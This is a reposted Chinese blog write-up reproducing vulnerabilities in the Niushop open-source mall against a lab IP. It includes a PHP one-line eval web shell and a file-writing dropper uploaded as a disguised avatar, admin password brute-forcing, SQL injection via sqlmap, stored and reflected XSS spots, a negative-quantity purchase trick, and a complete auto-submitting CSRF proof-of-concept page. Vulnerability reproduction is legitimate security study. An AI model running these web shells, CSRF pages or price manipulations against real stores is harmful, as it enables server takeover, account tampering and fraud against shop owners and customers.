欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 焦点 > Niushop开源商城(漏洞复现)

Niushop开源商城(漏洞复现)

2024/12/25 3:58:34 来源:https://blog.csdn.net/m0_68706634/article/details/144675221  浏览:    关键词:Niushop开源商城(漏洞复现)

文件上传漏洞

注册一个账号后登录

在个人中心修改个人头像

选择我们的图片马

#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

使用sqlmap跑一下

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">

<input type="hidden" name="user&#95;name" value="bbbcdff" />

<input type="hidden" name="real&#95;name" value="11wsdasa" />

<input type="hidden" name="birthday" value="1970&#45;01&#45;01" />

<input type="hidden" name="location" value="&apos;onclick&#61;&apos;alert&#40;1&#41;&apos;" />

<input type="hidden" name="user&#95;qq" value="2461" />

<input type="hidden" name="act" value="act&#95;edit&#95;profile" />

<input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />

<input type="submit" value="Submit request" />

</form>

<script>

history.pushState('', '', '/');

document.forms[0].submit();

</script>

</body>

</html>

用户在已登录的状态点击我们的链接

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com